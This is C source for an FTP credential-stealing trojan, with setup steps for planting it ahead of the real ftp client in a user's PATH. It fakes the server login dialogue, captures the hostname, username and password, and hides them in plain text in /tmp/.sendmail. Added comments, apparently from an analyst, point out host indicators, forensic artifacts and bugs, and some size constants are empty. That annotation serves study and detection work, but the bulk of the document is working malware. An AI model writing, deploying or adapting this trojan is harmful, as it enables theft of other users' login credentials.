FTP trojan that logs the hostname, username, and password whenever a local user runs ftp.
8a3d1bd7795300d33e45002f6a46e071fbefb450870201eac7e1aeee73cf0a9c
/*==================================================================================
FTP- Trojan- ftpt Ver 1.00
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
[Setup]
1. Please change folowing #define value for your environment
#define LOGFILE
#define NETRC
<d>
%which ftp
/usr/bin/ftp <--- This is real ftp. Please specify this path to #define FTPCMD
%cc ftpt.c -o ftp <--- comple this program
%mv ftp /tmp/temp/ <--- copy this program
edit ~/.cshrc
if set path exits in .cshrc, please set path env as follows,
set path=(. /tmp/temp /usr/bin
==================================================================================
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
/* File to which main() appends one "host=... user=... pass=..." line per
   session. It is opened with fopen(..., "a"), so its permissions depend on
   the umask of the user who ran the wrapper. For triage, an unexpected file
   at this path with that line format is a host indicator. */
#define LOGFILE "/tmp/.sendmail"
/* .netrc of the targeted account; main() overwrites it temporarily and then
   restores it from NETRCBAK. */
#define NETRC "/home/hoge/.netrc"
/* Path of the genuine ftp client that this wrapper hands control to. */
#define FTPCMD "/usr/bin/ftp"
/* Temporary copy of the account's original .netrc while the wrapper runs.
   It is created with fopen(..., "wb") under /tmp, so the original file's
   contents sit there with umask-dependent permissions until restored. */
#define NETRCBAK "/tmp/netrcbak"
#define TIMEOUT_V 5 /* Connection Timeout value */
/* NOTE(review): the three size macros below carry no value in this listing
   (possibly lost when the page was extracted), so the arrays declared with
   them in main() do not compile as shown. TIMEOUT_V and MAX_IPLEN are not
   referenced anywhere in the visible code. */
#define MAX_IPLEN
#define MAX_USERNAME
#define MAX_PASSWORD
/* Declared but never used in the visible code; no socket call appears in
   this listing. */
int sock;
/*
 * Entry point of a wrapper that impersonates ftp(1) and records what the
 * user types.
 *
 * Behaviour visible in this listing:
 *   - With no host argument, or when the host name does not resolve, it
 *     runs the genuine client (FTPCMD) and exits with status 1.
 *   - Otherwise it prints a locally generated "Connected to" / "220" /
 *     "331" dialogue (no connection is opened by this program), reads a
 *     user name and a password, parks the account's .netrc in NETRCBAK,
 *     writes a one-entry .netrc holding the typed credentials, runs the
 *     genuine client against the host, restores the parked .netrc and
 *     finally appends host, user and password to LOGFILE.
 *
 * Analyst notes (all derived from the code below):
 *   - Host artifacts: LOGFILE, NETRCBAK, and a transient rewrite of NETRC.
 *     The header comment additionally describes placing the binary under
 *     the name "ftp" in a directory searched before /usr/bin.
 *   - If the account had no .netrc, the first movefile() returns early and
 *     the final restore finds no NETRCBAK, so the .netrc written here
 *     (containing the typed password) is left in place.
 *   - The banner text is fixed and printed before any server is contacted,
 *     so it does not reflect the real server's greeting.
 *   - gets() and the strcpy() calls are unbounded, and getlogin() may
 *     return NULL; the program is not memory-safe on long or unusual input.
 *   - No value is returned from main (implicit int, K&R-style definition).
 */
main(argc,argv)
int argc;
char *argv[];
{
char *x;
char buf[200];
char user[MAX_USERNAME];
char pass[MAX_PASSWORD];
struct hostent *h;
FILE *fp;
void movefile();
/* No host given: behave exactly like the genuine client. */
if (argc==1){
system(FTPCMD);
exit(1);
}
/* Unresolvable host: print the client's usual error, then fall through to
   the genuine client so the session looks normal. */
if ((h=gethostbyname(argv[1]))==NULL){
printf("%s: unknown host\n",argv[1]);
system(FTPCMD);
exit(1);
}
/* Locally fabricated login dialogue; nothing has been sent to the host. */
printf("Connected to %s\n",h->h_name);
printf("220 %s FTP server ready.\n",h->h_name);
printf("Name (%s:%s): ",h->h_name,getlogin());
/* Unbounded read into a fixed-size buffer. */
gets(user);
/* Empty input falls back to the login name, as the prompt suggests. */
if (strlen(user)==0) strcpy(user,getlogin());
printf("331 Password required for %s\n",user);
/* getpass() reads from the terminal without echo; the result is copied
   without a length check. */
x=getpass("Password:");
if (strlen(x)!=0) strcpy(pass,x);
else strcpy(pass,"no_pass");
/* Park the account's existing .netrc (if any) in NETRCBAK. */
movefile(NETRC,NETRCBAK);
/* Write a single-entry .netrc with the typed credentials; presumably so
   the genuine client started below logs in without prompting again. */
if ((fp=fopen(NETRC,"w"))!=NULL){
fprintf(fp,"machine %s\n",h->h_name);
fprintf(fp,"login %s\n",user);
fprintf(fp,"password %s\n",pass);
fclose(fp);
/* Permissions are tightened only after the file has been written. */
sprintf(buf,"chmod go-rwx %s",NETRC);
system(buf);
}
/* Run the genuine client; the command line is built from the resolved
   host name and passed through the shell via system(). */
sprintf(buf,"%s %s",FTPCMD,h->h_name);
system(buf);
/* Put the parked .netrc back and re-apply the permission change. */
movefile(NETRCBAK,NETRC);
sprintf(buf,"chmod go-rwx %s",NETRC);
system(buf);
/* Append the captured triple to LOGFILE in plain text; a failed open is
   silently ignored. */
if ((fp=fopen(LOGFILE,"a"))!=NULL){
fprintf(fp,"host=%s user=%s pass=%s\n",h->h_name,user,pass);
fclose(fp);
}
}
/*
 * Copies file f1 to f2 one byte at a time and then deletes f1.
 *
 * f1: path of the file to move; if it cannot be opened the function
 *     returns without doing anything.
 * f2: destination path, opened with "wb" (created or truncated); if it
 *     cannot be opened, f1 is closed and left untouched.
 *
 * NOTE(review): the loop tests feof() before reading, so the last getc()
 * returns EOF and that value is still handed to putc(). Where EOF is -1
 * this appends one extra 0xFF byte per copy. A .netrc that has gone
 * through the park/restore cycle in main() would therefore end with such
 * bytes, which can serve as a forensic artifact when examining the file.
 *
 * The results of putc(), fclose() and remove() are not checked, and f1 is
 * removed even if writing to f2 failed.
 */
void movefile(f1,f2)
char *f1,*f2;
{
FILE *fp1,*fp2;
/* Source missing or unreadable: nothing to move. */
if ((fp1=fopen(f1,"rb"))==NULL) return;
if ((fp2=fopen(f2,"wb"))==NULL){
fclose(fp1);
return;
}
for(;;){
/* feof() only becomes true after a read has hit end-of-file, so one
   EOF value is written before this check ends the loop. */
if (feof(fp1)) break;
putc(getc(fp1),fp2);
}
fclose(fp1);
fclose(fp2);
/* Delete the source unconditionally, completing the "move". */
remove(f1);
}
ftpt.c